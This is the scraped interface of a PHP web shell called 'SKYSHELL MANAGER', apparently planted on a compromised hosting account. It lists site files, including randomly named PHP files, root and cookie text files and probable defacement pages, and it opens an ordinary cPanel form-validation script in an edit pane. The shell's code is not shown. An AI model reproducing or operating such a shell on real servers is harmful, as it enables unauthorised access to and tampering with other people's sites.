📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: validation_definitions.js
/* # Copyright(c) 2020 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited */ /* Validation Atoms (the lowest level of validation structure) > contains a boolean function in one of the following formats: valid_chars, invalid_chars, valid, invalid, min_length, max_length, less_than, greater_than > each method is accompanied with a message (msg) > messages can have some limited variable interpolation valid_chars, invalid_chars > character string > can contain three optional ranges: a-z, A-Z, 0-9 > msg has 1 variable available to it: %invalid_chars% valid_regexp > regular expression > should be very basic and easy to read > must work in both Perl and JavaScript > if the input string finds a match against the regular expression the function returns true > if the regular expression finds a match against the input string --> return true > if the regular expression does not find a match against the input string --> return false invalid_regexp > regular expression > should be very basic and easy to read > must work in both Perl and JavaScript > msg has 1 variable available to it: %invalid% > if the input string finds a match against the regular expression the function returns false max_length, min_length > integer > compares against the length of the string > msg has no variables available less_than, greater_than > integer > treats the string as an number, returns false if the string is not a number > msg has no variables available */ CPANEL.validation_definitions = { "IPV4_ADDRESS": [{ "min_length": "1", "msg": "IP Address cannot be empty." }, { "valid_chars": ".0-9", "msg": "IP Address must contain only digits and periods." }, { "valid_regexp": "/^([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])$/", "msg": "IP Address not formatted correctly. ie: 4.2.2.2, 192.168.1.100" }], "IPV4_ADDRESS_NO_LOCAL_IPS": [ "IPV4_ADDRESS", { "invalid_regexp": "/(127\\.0\\.0\\.1)|(0\\.0\\.0\\.0)/", "msg": "IP Address cannot be local. ie: 127.0.0.1, 0.0.0.0" } ], "LOCAL_EMAIL": [{ "min_length": "1", "msg": "Email cannot be empty." }, { "max_length": "128", "msg": "Email cannot be longer than 128 characters." }, { "invalid_chars": " ", "msg": "Email cannot contain spaces." }, { "invalid_regexp": "/\\.\\./", "msg": "Email cannot contain two consecutive periods." }, { "invalid_regexp": "/^\\./", "msg": "Email cannot start with a period." }, { "invalid_regexp": "/\\.$/", "msg": "Email cannot end with a period. %invalid%" }], "LOCAL_EMAIL_CPANEL": [ "LOCAL_EMAIL", { "valid_chars": ".a-zA-Z0-9!#$=?^_{}~-", "msg": "Email contains illegal characters: %invalid_chars%" } ], "LOCAL_EMAIL_RFC": [ "LOCAL_EMAIL", { "valid_chars": ".a-zA-Z0-9!#$%&'*+/=?^_`{|}~-", "msg": "Email contains illegal characters: %invalid_chars%" } ], "FULL_EMAIL": [{ "min_length": "1", "msg": "Email cannot be empty." }, { "invalid_chars": " ", "msg": "Email cannot contain spaces." }, { "": "", "msg": "" }], "FULL_EMAIL_CPANEL": [ ], "FULL_EMAIL_RFC": [ ], "DOMAIN": [ ], "SUBDOMAIN": [{ "min_length": "1", "msg": "Subdomain cannot be empty." }, { "max_length": "63", "msg": "Subdomain cannot be longer than 63 characters." }, { "invalid_chars": " ", "msg": "Subdomain cannot contain spaces." }, { "invalid_regexp": "\\.\\.", "msg": "Subdomain cannot contain two consecutive periods." }, { "valid_chars": "a-zA-Z0-9_-.", "msg": "Subdomain contains invalid characters: %invalid_chars%" }], "FQDN": [ ], "TLD": [ ], "FTP_USERNAME": [ ], "MYSQL_DB_NAME": [ ], "MYSQL_USERNAME": [ ], "POSTGRES_DB_NAME": [ ], "POSTGRES_USERNAME": [ ] };
Save